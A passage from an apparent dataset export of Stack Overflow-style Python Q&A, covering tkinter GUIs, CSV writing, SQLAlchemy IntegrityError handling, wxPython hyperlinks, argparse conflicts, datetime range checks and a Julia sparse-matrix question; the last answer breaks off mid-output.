text
stringlengths 226
34.5k
|
---|
Output a function in tkinter that prints
Question: I have created a function, which takes two arguments, prints multiple
statements out and eventually returns an answer. It works great in the python
shell.
I am using tkinter (python 3.4.1) to create a user friendly program for
consumers to use my function. I wish to have my function output everything to
something (I am using a listbox) and then the user could scroll through the
statements. However, it only outputs the return value, and not the print
statements. Why??
This is my code, and I believe the problem is in the PageOne class.
import tkinter as tk from tkinter import ttk from Collections import primes
from Collections import isprime from Collections import LS import sys
LARGE_FONT = ("Verdana", 12)
NORM_FONT = ("Verdana", 10)
SMALL_FONT = ("Verdana", 8)
def popupmsg(msg):
popup = tk.Tk()
popup.wm_title("!")
label = ttk.Label(popup, text=msg, font=NORM_FONT)
label.pack(side="top", fill="x", pady = 10)
B1 = ttk.Button(popup, text="Okay", command = popup.destroy)
B1.pack()
popup.mainloop()
class Mathapp(tk.Tk):
def __init__(self, *args, **kwargs):
tk.Tk.__init__(self, *args, **kwargs)
tk.Tk.iconbitmap(self, default="psi.ico")
tk.Tk.wm_title(self, "Math App")
container = tk.Frame(self)
container.pack(side="top", fill="both", expand = True)
container.grid_rowconfigure(0, weight=1)
container.grid_columnconfigure(0, weight=1)
menubar = tk.Menu(container)
filemenu = tk.Menu(menubar, tearoff = 0)
filemenu.add_command(label = "Save settings", command = lambda: popupmsg("Not supported just yet!"))
filemenu.add_separator()
filemenu.add_command(label = "Exit", command = quit)
menubar.add_cascade(label = "File", menu=filemenu)
prog = tk.Menu(menubar, tearoff = 0)
prog.add_command(label = "Legendre Symbol", command = lambda: popupmsg("Not supported just yet!"))
prog.add_command(label = "Prime Sieve", command = lambda: popupmsg("Not supported just yet!"))
prog.add_command(label = "Prime Factorisation - Sieve", command = lambda: popupmsg("Not supported just yet!"))
menubar.add_cascade(label = "Programs", menu=prog)
tk.Tk.config(self, menu=menubar)
self.frames = {}
for F in (StartPage, PageOne, PageTwo, PageThree):
frame = F(container, self)
self.frames[F] = frame
frame.grid(row=0, column=0, sticky="nsew")
self.show_frame(StartPage)
def show_frame(self, cont):
frame = self.frames[cont]
frame.tkraise()
class StartPage(tk.Frame):
def __init__(self, parent, controller):
tk.Frame.__init__(self, parent)
label = tk.Label(self, text="Start Page", font=LARGE_FONT)
label.pack(pady = 10, padx = 10)
button1 = ttk.Button(self, text="Legendre Symbol",
command = lambda: controller.show_frame(PageOne))
button1.pack()
button2 = ttk.Button(self, text="Prime test - Sieve",
command = lambda: controller.show_frame(PageTwo))
button2.pack()
button3 = ttk.Button(self, text="Prime Factorisation",
command = lambda: controller.show_frame(PageThree))
button3.pack()
class PageOne(tk.Frame):
def __init__(self, parent, controller):
tk.Frame.__init__(self, parent)
label = tk.Label(self, text="Legendre Symbol", font=LARGE_FONT)
label.pack(pady = 10, padx = 10)
button1 = ttk.Button(self, text="Back to home",
command = lambda: controller.show_frame(StartPage))
button1.pack()
##################
def show_answer():
Ans = str(LS(int(num1.get()),int(num2.get())))
listbox.delete(0,"end")
listbox.insert(0, LS(int(num1.get()),int(num2.get())))
tk.Label(self, text = "Enter the numbers to be tested ").pack()
num1 = tk.Entry(self)
num1.pack()
num2 = tk.Entry(self)
num2.pack()
blank = tk.Scrollbar(self)
blank.pack()
listbox= tk.Listbox(self, yscrollcommand=blank.set)
listbox.pack()
tk.Button(self, text = "Test", command = show_answer).pack()
##################
app = Mathapp()
app.mainloop()
Answer: It looks like the problem is probably here:
def show_answer():
Ans = str(LS(int(num1.get()),int(num2.get())))
listbox.delete(0,"end")
listbox.insert(0, LS(int(num1.get()),int(num2.get())))
I'd suggest creating a couple of entry widgets from the command line, and
modifying this function until you can get and print the contents of the
entries. You may have too much packed into one line in the `Ans` and
`listbox.insert` lines; try separating the different steps into different
lines of code. When you've got the entry widget contents, you might try
inserting them one at a time at the `end` index of the listbox (which of
course will be `0` if there's nothing in it yet, but `1` if there's already an
item).
|
Sending information gathered from questionnaire to a Python document?
Question: I'm brand new to both Python and StackOverflow, and I have a problem that has
been stumping me for the past couple of hours.
I am making a peer-evaluation script for my high-school class. When you run
the script, you input your classmate's name, then you rate them 1-10 on
effort, accountability, and participation. These 3 values are then averaged.
This average is assigned to the variable "grade". Since each classmate is
going to get multiple grades, I need to have the "grade" variable export to
another Python document where I can average every grade for each respective
classmate.
So far, I have the script create a .txt file with the same name as the
evaluated classmate, and the grade integer is stored there. Does anyone know
of a way that I can export that integer to a Python file where I can append
each successive grade so they can then be averaged?
Thanks
# Python peer evaluation script
def script(): classmate = input('Please enter your classmate\'s name: ')
classmateString = str(classmate)
effortString = input('Please enter an integer from 1-10 signifying your classmate\'s overall effort during LLS: ')
effort = int(effortString)
accountabilityString = input('Please enter an integer from 1-10 signifying how accountable your classmate was during LLS: ')
accountability = int(accountabilityString)
participationString = input('Please enter an integer from 1-10 signifying your classmate\'s overall participation: ')
participation = int(participationString)
add = effort + accountability + participation
grade = add / 3
gradeString = str(grade)
print ('Your grade for ', classmate, 'is: ', grade)
print ('Thank you for your participation. Your input will help represent your classmate\'s grade for the LLS event.')
filename = (classmateString)+'.txt'
file = open(filename, 'a+')
file.write(gradeString)
file.close()
print ('Move on to next classmate?')
yes = set(['yes','y','Yes','Y'])
no = set(['no','n','No','n'])
choice = input().lower()
if choice in yes:
script()
elif choice in no:
sys.exit(0)
else:
sys.stdout.write("Please respond with 'yes' or 'no'")
script()
script()
Answer: put
import name_of_script_file
at the top of your Python file, assuming they are in the same folder.
Then you can access the variable like:
name_of_script_file.variable_name
|
Python TKinter: Not moving to next frame and not saving variables and radio buttons not saving answers
Question: Okay, so the main issues are as follows: I am not able to move from frame
three to four all of a sudden; When I have my buttons call the commands, they
are not saving the names or checking if the answers are correct, any help
would be appreciated
from tkinter import *
import random
import sys
#Question class, list of questions, and method to ask and choose the questions
class Question():
def __init__(self,question,answer,options):
self.question = question
self.answer = answer
self.options = options
def ask(self):
print (self.question + "?")
for n, option in enumerate(self.options):
print ("%d) %s" % (n + 1, options))
response = int(sys.stdin.readline().strip()) # answers are integers
if response == self.answer:
print ("CORRECT")
else:
print ("wrong")
questions = [
Question("what is a group of crows called",1,["murder","the night's watch", "school", "flock"]),
Question("What is the square root of a potato",4,["does not exist","b)Half a potato"," c)Two equal portions that together add up to half the potato"," d)9"]),
Question("What is the name of the owner of the white wand in Harry Potter",2,["a)Harry"," b)Voldemort ","c)Snape ","d)Ron"]),
Question("How fast is a cheetah",2,["a)very fast"," b)ultra fast"," c)fast"," d)not as fast as the author of this game"]),
Question("How old must Spongebob be",4,[" a)9"," b)16"," c)58"," d)18"]),
Question("the best type of art is",3,[" a)classic"," b)french"," c)waveform"," d)electronic"]),
Question("the best sculputres are made out of",1,[" a)styrofoam"," b)chloroform"," c)metal"," d)clay"]),
Question("the best basketball player in the world is",3,[" a)chef curry"," b)stephanie cuurry"," c)Like Mike"," d)Paul George"]),
Question("the best soccer player in the world is",1,[" a)Harry Kane ","b)Shoalin Soccer Protaganist"," c)Neymar ","d)Rooney"]),
Question("which of the following people is an EGOT winner",1,[" a)whoopie goldberg"," b)neil patrick harris"," c)Tracy jordan"," d)Dule Hill"]),
Question("how many sides are on an egyptian pyramid",3,[" a)4"," b)5"," c)3000"," d)100"]),
Question("who is the real hero of the karate kid",4,[" a)ralph machio"," b)mr miyagi"," c)the tiger guy who almost beats ralph"," d)danny sans mom"]),
Question("which was not a best picture winner",2,[" a)birdman"," b)dark knight"," c)gladiator"," d)hurt locker"]),
Question("the most common surname is",3,[" a)smith"," b)mohamed"," c)Lee"," d)miller"]),
Question("is it a good choice to take APES",4,[" a)yes its easy"," b)no its stupid ","c)yes its very interesting"," d)no because in one year the dark overlord khatulu may wreak havoc on all environments"]),
]
random.shuffle(questions)
#for question in questions:
# question.ask()
########GUI##############
def setName():
user1 = userOneName.get()
user2 = userTwoName.get()
def raise_frame(frame):
frame.tkraise()
def combine_funcs(*funcs):
def combined_func(*args, **kwargs):
for f in funcs:
f(*args, **kwargs)
return 1
return combined_func
def checkAnswerUser1(intVariable, number):
if (intVariable == questions[number].answer):
user1Score = user1Score + 1
def checkAnswerUser2(intVariable, number):
if (intVariable == questions[number].answer):
user2Score = user2Score + 1
def resetGame():
userOneName = ""
userTwoName = ""
user1Score = 0
user2Score = 0
random.shuffle(questions)
root = Tk()
f1 = Frame(root)
f2 = Frame(root)
f3 = Frame(root)
f4 = Frame(root)
f5 = Frame(root)
f6 = Frame(root)
f7 = Frame(root)
f8 = Frame(root)
f9 = Frame(root)
f10 = Frame(root)
f11 = Frame(root)
f12 = Frame(root)
for frame in (f1, f2, f3, f4, f5, f6, f7, f8, f9, f10, f11, f12):
frame.grid(row=0, column=0, sticky='news')
### First Frame
#Labels and Entry boxes for user names
##content = StringVar()
##content2 = StringVar()
userOneLabel = Label(f1, text="User 1: Enter your name:")
userOneName = Entry(f1)
userTwoLabel = Label(f1, text="User 2: Enter your name:")
userTwoName = Entry(f1)
userOneLabel.pack(fill=X)
userOneName.pack(fill=X)
userTwoLabel.pack(fill=X)
userTwoName.pack(fill=X)
user1 = userOneName.get()
user2 = userTwoName.get()
user1Score = 0
user2Score = 0
##Next Button
NextButton = Button(f1, text='Next ---->', command=combine_funcs(lambda:raise_frame(f2),setName()))
NextButton.pack(side=RIGHT)
v = IntVar()
###Second Frame
questionPrinter1 = Label(f2, text= user1 + questions[0].question)
questionPrinter1.pack()
Radiobutton(f2, text=questions[0].options[0], variable=v, value=1).pack(side=TOP)
Radiobutton(f2, text=questions[0].options[1], variable=v, value=2).pack(side=TOP)
Radiobutton(f2, text=questions[0].options[2], variable=v, value=3).pack(side=TOP)
Radiobutton(f2, text=questions[0].options[3], variable=v, value=4).pack(side=TOP)
#When button is clicked, if the correct radio button is clicked, add 1 to the score
#add the same frame except change the user name
#do the choose random function every time the button is clicked
NextButton1 = Button(f2, text='Next ---->', command=combine_funcs(lambda:raise_frame(f3), checkAnswerUser1(v,0)))
NextButton1.pack(side=RIGHT)
###Third Frame
j = IntVar()
questionPrinter2 = Label(f3, text= (user1 + questions[1].question))
questionPrinter2.pack()
Radiobutton(f3, text=questions[1].options[0], variable=j, value=1).pack(side=TOP)
Radiobutton(f3, text=questions[1].options[1], variable=j, value=2).pack(side=TOP)
Radiobutton(f3, text=questions[1].options[2], variable=j, value=3).pack(side=TOP)
Radiobutton(f3, text=questions[1].options[3], variable=j, value=4).pack(side=TOP)
NextButton2 = Button(f3, text='Next ------>', command=(lambda:raise_frame(f4),checkAnswerUser2(j,1)))
NextButton2.pack(side=RIGHT)
###Fourth Frame
questionPrinter3 = Label(f4, text= user1 + questions[2].question)
questionPrinter3.pack()
k = IntVar()
Radiobutton(f4, text=questions[2].options[0], variable=k, value=1).pack(side=TOP)
Radiobutton(f4, text=questions[2].options[1], variable=k, value=2).pack(side=TOP)
Radiobutton(f4, text=questions[2].options[2], variable=k, value=3).pack(side=TOP)
Radiobutton(f4, text=questions[2].options[3], variable=k, value=4).pack(side=TOP)
NextButton3 = Button(f4, text='Next ---->', command=(lambda:raise_frame(f5),checkAnswerUser1(k,2)))
NextButton3.pack(side=RIGHT)
### Fifth Frame
questionPrinter3 = Label(f5, text= user1 + questions[3].question)
questionPrinter3.pack()
a = IntVar()
Radiobutton(f5, text=questions[3].options[0], variable=a, value=1).pack(side=TOP)
Radiobutton(f5, text=questions[3].options[1], variable=a, value=2).pack(side=TOP)
Radiobutton(f5, text=questions[3].options[2], variable=a, value=3).pack(side=TOP)
Radiobutton(f5, text=questions[3].options[3], variable=a, value=4).pack(side=TOP)
NextButton3 = Button(f5, text='Next ---->', command=(lambda:raise_frame(f6),checkAnswerUser2(a,3)))
NextButton3.pack(side=RIGHT)
###Sixth Frame
questionPrinter3 = Label(f6, text= user1 + questions[4].question)
questionPrinter3.pack()
b = IntVar()
Radiobutton(f6, text=questions[4].options[0], variable=b, value=1).pack(side=TOP)
Radiobutton(f6, text=questions[4].options[1], variable=b, value=2).pack(side=TOP)
Radiobutton(f6, text=questions[4].options[2], variable=b, value=3).pack(side=TOP)
Radiobutton(f6, text=questions[4].options[3], variable=b, value=4).pack(side=TOP)
NextButton3 = Button(f6, text='Next ---->', command=(lambda:raise_frame(f7),checkAnswerUser1(b,4)))
NextButton3.pack(side=RIGHT)
###7th Frame
questionPrinter3 = Label(f7, text= user1 + questions[5].question)
questionPrinter3.pack()
c = IntVar()
Radiobutton(f7, text=questions[5].options[0], variable=c, value=1).pack(side=TOP)
Radiobutton(f7, text=questions[5].options[1], variable=c, value=2).pack(side=TOP)
Radiobutton(f7, text=questions[5].options[2], variable=c, value=3).pack(side=TOP)
Radiobutton(f7, text=questions[5].options[3], variable=c, value=4).pack(side=TOP)
NextButton3 = Button(f7, text='Next --->', command=(lambda:raise_frame(f8),checkAnswerUser2(c,5)))
NextButton3.pack(side=RIGHT)
###8th Frame
questionPrinter3 = Label(f8, text= user1 + questions[6].question)
questionPrinter3.pack()
d = IntVar()
Radiobutton(f8, text=questions[6].options[0], variable=d, value=1).pack(side=TOP)
Radiobutton(f8, text=questions[6].options[1], variable=d, value=2).pack(side=TOP)
Radiobutton(f8, text=questions[6].options[2], variable=d, value=3).pack(side=TOP)
Radiobutton(f8, text=questions[6].options[3], variable=d, value=4).pack(side=TOP)
NextButton3 = Button(f8, text='Next --->', command=(lambda:raise_frame(f9),checkAnswerUser1(d,6)))
NextButton3.pack(side=RIGHT)
###9th Frame
questionPrinter3 = Label(f9, text= user1 + questions[7].question)
questionPrinter3.pack()
e = IntVar()
Radiobutton(f9, text=questions[7].options[0], variable=e, value=1).pack(side=TOP)
Radiobutton(f9, text=questions[7].options[1], variable=e, value=2).pack(side=TOP)
Radiobutton(f9, text=questions[7].options[2], variable=e, value=3).pack(side=TOP)
Radiobutton(f9, text=questions[7].options[3], variable=e, value=4).pack(side=TOP)
NextButton3 = Button(f9, text='Next --->', command=(lambda:raise_frame(f10),checkAnswerUser2(e,7)))
NextButton3.pack(side=RIGHT)
##10th Frame
questionPrinter3 = Label(f10, text= user1 + questions[8].question)
questionPrinter3.pack()
f = IntVar()
Radiobutton(f10, text=questions[8].options[0], variable=f, value=1).pack(side=TOP)
Radiobutton(f10, text=questions[8].options[1], variable=f, value=2).pack(side=TOP)
Radiobutton(f10, text=questions[8].options[2], variable=f, value=3).pack(side=TOP)
Radiobutton(f10, text=questions[8].options[3], variable=f, value=4).pack(side=TOP)
NextButton3 = Button(f10, text='Next --->', command=(lambda:raise_frame(f11),checkAnswerUser1(f,8)))
NextButton3.pack(side=RIGHT)
##11th Frame
questionPrinter3 = Label(f11, text= user1 + questions[9].question)
questionPrinter3.pack()
g = IntVar()
Radiobutton(f11, text=questions[9].options[0], variable=g, value=1).pack(side=TOP)
Radiobutton(f11, text=questions[9].options[1], variable=g, value=2).pack(side=TOP)
Radiobutton(f11, text=questions[9].options[2], variable=g, value=3).pack(side=TOP)
Radiobutton(f11, text=questions[9].options[3], variable=g, value=4).pack(side=TOP)
NextButton3 = Button(f11, text='Next --->', command=(lambda:raise_frame(f12),checkAnswerUser2(g,9)))
NextButton3.pack(side=RIGHT)
## 12th and final frame
User1ScorePrinter = Label(f12, text= user1 + "'s score is:" + str(user1Score))
User1ScorePrinter.pack()
User2ScorePrinter = Label(f12, text= user2 + "'s score is:" + str(user1Score))
User2ScorePrinter.pack()
User1Winner = Label(f12, text = user1 + "is the winner")
User2Winner = Label(f12, text = user2 + "is the winner")
if(user1Score > user2Score):
User1Winner.pack()
else:
User2Winner.pack()
####when the game is reset, the user names should be reset, the questions should be shuffled, and the scores should be reset
NextButton3 = Button(f12, text='Restart the Game', command=combine_funcs(lambda:raise_frame(f1),resetGame()))
NextButton3.pack()
raise_frame(f1)
root.mainloop()
Answer: You don't need 12 frames to solve this. You can expand the Question class to
handle everything associated with a group of questions, which is exactly what
a class structure does. Note that this follows your code, but is quick and
dirty just to show how it is done, so you can and should make improvements.
class Question():
def __init__(self, root, questions):
self.fr=Frame(root)
self.fr.pack(side="top")
self.questions = questions
self.correct=False
self.ask()
def ask(self):
print (self.questions[0] + "?")
## [0]=question, [1]=correct answer
Label(self.fr, text=self.questions[0]+"?",
bg="lightyellow").pack()
self.options=self.questions[2]
self.correct_answer=self.options[self.questions[1]-1]
self.v=IntVar()
self.v.set(0)
## allow for options of different lengths
for ctr in range(len(self.options)):
b=Radiobutton(self.fr, text=self.options[ctr], variable=self.v, value=ctr,
command=self.check_answer)
b.pack()
self.result=Label(self.fr, text="", bg="lightblue")
self.result.pack()
def check_answer(self):
self.correct=False
number=self.v.get()
if (self.correct_answer == self.options[number]):
self.correct=True
self.result["text"]="Correct"
else:
self.result["text"]="Wrong"
## while testing
print self.correct, number, self.options[number]
class AskAllQuestions():
def __init__(self, root):
self.root=root
self.this_question=0
self.total_correct=0
self.TQ=None
self.next_but=None
self.shuffle_questions()
self.next_question()
def next_question(self):
""" self.this_question is a number that increments on each pass
self.question_order is a list of numbers in random order
so self.next_question picks the self.this_question number
from the random order self.question_order list
"""
if self.TQ: ## not first question
if self.TQ.correct:
self.total_correct += 1
print "Total Correct", self.total_correct
self.TQ.fr.destroy()
self.next_q_fr.destroy()
if self.this_question < len(self.question_order):
this_question_num=self.question_order[self.this_question]
self.this_question += 1
self.next_q_fr=Frame(self.root)
self.next_q_fr.pack(side="bottom")
self.next_but=Button(self.next_q_fr, text='Next ---->', bg="orange",
command=self.next_question)
self.next_but.pack(side="top")
Button(self.next_q_fr, text="End Program", command=root.quit,
bg="red").pack(side="bottom")
self.TQ=Question(self.root, self.all_questions[this_question_num])
else:
self.root.quit()
def shuffle_questions(self):
self.all_questions = [
("what is a group of crows called",1,["murder","the night's watch", "school", "flock"]),
("What is the square root of a potato",4,["does not exist","b)Half a potato"," c)Two equal portions that together add up to half the potato"," d)9"]),
("What is the name of the owner of the white wand in Harry Potter",2,["a)Harry"," b)Voldemort ","c)Snape ","d)Ron"]),
("How fast is a cheetah",2,["a)very fast"," b)ultra fast"," c)fast"," d)not as fast as the author of this game"]),
("How old must Spongebob be",4,[" a)9"," b)16"," c)58"," d)18"]),
("the best type of art is",3,[" a)classic"," b)french"," c)waveform"," d)electronic"]),
("the best sculputres are made out of",1,[" a)styrofoam"," b)chloroform"," c)metal"," d)clay"]),
("the best basketball player in the world is",3,[" a)chef curry"," b)stephanie cuurry"," c)Like Mike"," d)Paul George"]),
("the best soccer player in the world is",1,[" a)Harry Kane ","b)Shoalin Soccer Protaganist"," c)Neymar ","d)Rooney"]),
("which of the following people is an EGOT winner",1,[" a)whoopie goldberg"," b)neil patrick harris"," c)Tracy jordan"," d)Dule Hill"]),
("how many sides are on an egyptian pyramid",3,[" a)4"," b)5"," c)3000"," d)100"]),
("who is the real hero of the karate kid",4,[" a)ralph machio"," b)mr miyagi"," c)the tiger guy who almost beats ralph"," d)danny sans mom"]),
("which was not a best picture winner",2,[" a)birdman"," b)dark knight"," c)gladiator"," d)hurt locker"]),
("the most common surname is",3,[" a)smith"," b)mohamed"," c)Lee"," d)miller"]),
("is it a good choice to take APES",4,[" a)yes its easy"," b)no its stupid ","c)yes its very interesting"," d)no because in one year the dark overlord khatulu may wreak havoc on all environments"]),
]
self.question_order=range(len(self.all_questions))
random.shuffle(self.question_order)
root=Tk()
AQ=AskAllQuestions(root)
root.mainloop()
|
write a Python 3 list to .csv
Question: I have a list that i need to write to a .csv Yes, i have done a LOT of looking
around (of course i found [this
link](http://stackoverflow.com/questions/9372705/how-to-write-a-list-to-a-csv-
file) which is close to the target, but misses my case) You see `writerows` is
having all sorts of trouble with the delimiters/formatting in the .csv (the
**a** gets separated from the **1** from the **7** etc etc)
My list looks like this:
`buffer = [['a17', 'b17', 'c17', '8', 'e17', 'f17\n'], ['a24', 'b24', 'c24',
'6', 'e24', 'f24\n'], ['a27', 'b27', 'c27', '9', 'e27', 'f27\n'], ['a18',
'b18', 'c18', '9', 'e18', 'f18\n'], ['a5', 'b5', 'c5', '5', 'e5', 'f5\n'],
['a20', 'b20', 'c20', '2', 'e20', 'f20\n'], ['a10', 'b10', 'c10', '1', 'e10',
'f10\n'], ['a3', 'b3', 'c3', '3', 'e3', 'f3\n'], ['a11', 'b11', 'c11', '2',
'e11', 'f11\n']]`
I can see its like a list of lists so i tried `for eachRow in buffer:` then
following on with a `eachRow.split(',')` but no good there either. I just need
to write to a .csv it should be easy right... what am i missing?
Answer: You can remove the \n string from your buffer like so. Also you have to add
`newline=''` to the with statement in Python 3. See [this
answer](http://stackoverflow.com/a/16716489/1519290) for more detail.
import csv
buffer = [['a17', 'b17', 'c17', '8', 'e17', 'f17\n'],
['a24', 'b24', 'c24', '6', 'e24', 'f24\n'],
['a27', 'b27', 'c27', '9', 'e27', 'f27\n'],
['a18', 'b18', 'c18', '9', 'e18', 'f18\n'],
['a5', 'b5', 'c5', '5', 'e5', 'f5\n'],
['a20', 'b20', 'c20', '2', 'e20', 'f20\n'],
['a10', 'b10', 'c10', '1', 'e10', 'f10\n'],
['a3', 'b3', 'c3', '3', 'e3', 'f3\n'],
['a11', 'b11', 'c11', '2', 'e11', 'f11\n']]
for list in buffer:
for index, string in enumerate(list):
list[index] = list[index].replace('\n', '')
with open('output.csv', 'w', newline='') as f:
writer = csv.writer(f)
writer.writerows(buffer)
|
IntegrityError not caught in SQLAlchemy event listener
Question: I'm building a simple database driven blog with Flask and SQLAlchemy. In the
model for the blog postings I define title and slug attributes:
class BlogPost(Model):
...
title = Column(String(80))
slug = Column(String(80), unique=True)
Later I use an event listener to automatically create and insert a slug from
the title:
@event.listens_for(BlogPost.title, 'set')
def autoslug(target, value, oldvalue, initiator):
target.slug = slugify(value)
As expected, if I try to add a post to the database, and the title of the post
evaluates to the same slug as a previous post, then the transaction fails with
an IntegrityError. I don't think in practice this will be a problem anyway.
But just for giggles I tried something like this:
from sqlalchemy.exc import IntegrityError
@event.listens_for(BlogPost.title, 'set')
def autoslug(target, value, oldvalue, initiator):
try:
target.slug = slugify(value)
except IntegrityError:
target.slug = slugify(value) + random_string()
`random_string` could be anything, really, the point is that nothing that I've
tried gets executed because the IntegrityError isn't getting caught, and I'm
not sure why - attempting to add & commit a post to the database with the same
title still raises an IntegrityError and aborts the transaction when I try to
commit. I've seen a handful of other posts about it, but the answers are
mostly pretty specific to Pyramid, which I'm not using.
Anybody know what I'm missing here?
Tech involved: Python3, Flask, Flask-Sqlalchemy, Sqlalchemy
Answer: SQLAlchemy will not
[flush](http://docs.sqlalchemy.org/en/latest/orm/session_basics.html#flushing)
changes to model objects to DB when setting. In order to get the error you
have to do something like
from sqlalchemy.exc import IntegrityError
from sqlalchemy.orm.session import object_session
@event.listens_for(BlogPost.title, 'set')
def autoslug(target, value, oldvalue, initiator):
session = object_session(target)
try:
with session.begin_nested():
target.slug = slugify(value)
session.flush()
except IntegrityError:
target.slug = slugify(value) + random_string()
Note that you have to wrap your possible integrity violation in a nested
transaction (a [savepoint](https://en.wikipedia.org/wiki/Savepoint)), or your
whole transaction will fail even though you catch the `IntegrityError`. If
your DB doesn't support savepoints or an SQLAlchemy implementation of the
idea, you're out of luck.
|
How to unset or disable hyperlinkctrl in wxpython only on some conditions
Question: I have created hyperlinkctrl on my panel.Under some conditions it should be
hyperlink but other cases it should be just text not link.
How to do this?
self.Author = wx.HyperlinkCtrl(self, -1, "", "~")
if true:
self.Author.SetLabel(str(self.aList['Author']))
self.Author.SetURL("mailto:%s" % str(self.aList['Author']))
else:
self.Author.SetLabel("N/A")
self.Author.SetURL("N/A")
In the else case with `"N/A"` still it is linking.
can any one tell me how to unset the url in wxPython?
Answer: Simply toggle between:
self.Author.Enable()
and:
self.Author.Disable()
Edit: To redisplay `self.Author` without the underline which goes with a
hyperlink
import wx
class MyFrame(wx.Frame):
def __init__(self, parent, id, title):
wx.Frame.__init__(self, parent, id, title, (-1, -1), wx.Size(300, 200))
self.panel1 = wx.Panel(self)
self.Author = wx.HyperlinkCtrl(self.panel1, -1, "", "http://127.0.0.1/some_directory/",pos=(30,50))
self.Button = wx.Button(self.panel1, -1, "Click Me", pos=(80,100))
self.Button.Bind(wx.EVT_BUTTON, self.OnButton)
self.Show()
def OnButton(self,event):
self.Author.Hide()
if self.Author.IsEnabled():
self.Author = wx.StaticText(self.panel1, -1, "http://127.0.0.1/some_directory/", pos=(30,50))
self.Author.Disable()
else:
self.Author = wx.HyperlinkCtrl(self.panel1, -1, "", "http://127.0.0.1/some_directory/", pos=(30,50))
self.Author.Enable()
self.Author.Show()
self.Update()
if __name__ == '__main__':
app = wx.App()
frame = MyFrame(None, -1, 'Hyperlink')
app.MainLoop()
|
Handling argparse conflicts
Question: If I import a Python [module](https://github.com/paulcalabro/api-
kickstart/blob/master/examples/python/config.py) that is already using
**argparse** , however, I would like to use **argparse** in my script as well
...how should I go about doing this?
I'm receiving a _unrecognized arguments_ error when using the following code
and invoking the script with a -t flag:
**Snippet:**
#!/usr/bin/env python
....
import conflicting_module
import argparse
...
#################################
# Step 0: Configure settings... #
#################################
parser = argparse.ArgumentParser(description='Process command line options.')
parser.add_argument('--test', '-t')
**Error:**
unrecognized arguments: -t foobar
Answer: You need to guard your **imported modules** with
if __name__ == '__main__':
...
against it running initialization code such as argument parsing on import. See
[What does `if __name__ == "__main__":`
do?](http://stackoverflow.com/questions/419163/what-does-if-name-main-do).
So, in your `conflicting_module` do
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Process command line options in conflicting_module.py.')
parser.add_argument('--conflicting', '-c')
...
instead of just creating the parser globally.
If the parsing in `conflicting_module` is a mandatory part of application
configuration, consider using
args, rest = parser.parse_known_args()
in your main module and passing `rest` to `conflicting_module`, where you'd
pass either `None` or `rest` to `parse_args`:
args = parser.parse_args(rest)
That is still a bit bad style and actually the classes and functions in
`conflicting_module` would ideally receive parsed configuration arguments from
your main module, which would be responsible for parsing them.
|
How to check if a date period is embraced by another date period in python?
Question: What is the most pythonic way to check if a date period is embraced by another
date period in python?
for example
start_1 = datetime.datetime(2016, 3, 16, 20, 30)
end_1 = datetime.datetime(2016, 3, 17, 20, 30)
start_2 = datetime.datetime(2016, 3, 14, 20, 30)
end_2 = datetime.datetime(2016, 3, 17, 22, 30)
so `[start_1, end_1]` obviously lies inside `[start_2, end_2]`, you can check
it by using `<`, `>` operators, but I'd like to know if there's a library
function to perform this check easily.
Answer: You can do that using a pip module:
pip install DateTimeRange
which can be used:
>>> start_1 = datetime.datetime(2016, 3, 16, 20, 30)
>>> end_1 = datetime.datetime(2016, 3, 17, 20, 30)
>>> start_2 = datetime.datetime(2016, 3, 14, 20, 30)
>>> end_2 = datetime.datetime(2016, 3, 17, 22, 30)
>>> dtr1 = datetimerange.DateTimeRange(start_1, end_1)
>>> dtr2 = datetimerange.DateTimeRange(start_2, end_2)
You can check whether one range intersects the other:
>>> dtr1.is_intersection(dtr2)
True
But it does not show whether the range is fully within the other. To check
whether a time range contains another, you still have to check boundaries:
>>> dtr1.start_datetime in dtr2
True
>>> dtr1.end_datetime in dtr2
True
Though I believe this is a good opportunity for a patch, to implement the
`__contains__` method in a fashion that supports for `datetimerange` as LHS
argument of the `in` operator.
>>> dtr1 in dtr2
[…] /datetimerange/__init__.py", line 136, in __contains__
return self.start_datetime <= value <= self.end_datetime
TypeError: unorderable types: datetime.datetime() <= DateTimeRange()
_Nota Bene_ : I have [pushed a
commit](https://github.com/thombashi/DateTimeRange/pull/12) to make that
possible, so now the following works:
>>> import datetime
>>> import datetimerange
>>> start_1 = datetime.datetime(2016, 3, 16, 20, 30)
>>> start_2 = datetime.datetime(2016, 3, 14, 20, 30)
>>> end_1 = datetime.datetime(2016, 3, 17, 20, 30)
>>> end_2 = datetime.datetime(2016, 3, 17, 22, 30)
>>> dtr1 = datetimerange.DateTimeRange(start_1, end_1)
>>> dtr2 = datetimerange.DateTimeRange(start_2, end_2)
>>>
>>> dtr1 in dtr2
True
>>> dtr2 in dtr1
False
HTH
|
Similar function to to_scipy_sparse_matrix in Julia sparse matrices functions
Question: I would like to ask if there is equivalent function in **Julia** language and
its
[functions](http://docs.julialang.org/en/release-0.3/stdlib/arrays/?highlight=sparse#sparse-
matrices) for sparse matrices to
[to_scipy_sparse_matrix](https://networkx.github.io/documentation/latest/reference/generated/networkx.convert_matrix.to_scipy_sparse_matrix.html#networkx.convert_matrix.to_scipy_sparse_matrix)
in **networkx**.
I am looking for equivalent to calling this function in [eigenvector
centrality
algorithm](https://github.com/networkx/networkx/blob/master/networkx/algorithms/centrality/eigenvector.py#L206).
Is there possibility to run this function as stated above, in eigenvector
centrality link, in **Julia** to produce the same output ?
Thanks for any suggestions. I am struggling few hours with this and I am
unable to make any results.
**Edit:**
Python version :
import networkx as nx
import scipy
G = nx.Graph()
G.add_edge(1, 2, w=1.0 )
G.add_edge(1, 3, w=0.5 )
G.add_edge(2, 3, w=2.5 )
M = nx.to_scipy_sparse_matrix(G, nodelist=list(G), weight='w',dtype=float)
print(M)
Output:
(0, 1) 1.0
(0, 2) 0.5
(1, 0) 1.0
(1, 2) 2.5
(2, 0) 0.5
(2, 1) 2.5
Julia version:
using Graphs
g1 = Graphs.graph(Graphs.ExVertex[], Graphs.ExEdge{Graphs.ExVertex}[], is_directed=false)
d = "dist"
v1 = add_vertex!(g1, "a")
v2 = add_vertex!(g1, "b")
v3 = add_vertex!(g1, "c")
e12 = add_edge!(g1, v1, v2)
e12.attributes[d]=1.0
e13 = add_edge!(g1, v1, v3)
e13.attributes[d]=0.5
e23 = add_edge!(g1, v2, v3)
e23.attributes[d]=2.5
Answer: Try (following OP Julia code):
julia> triple(e,d) = (e.source.index,e.target.index,e.attributes[d])
triple (generic function with 1 method)
julia> M = sparse(map(collect,zip([triple(e,d) for e in edges(g1)]...))...,length(g1.vertices),length(g1.vertices))
2x3 sparse matrix with 3 Float64 entries:
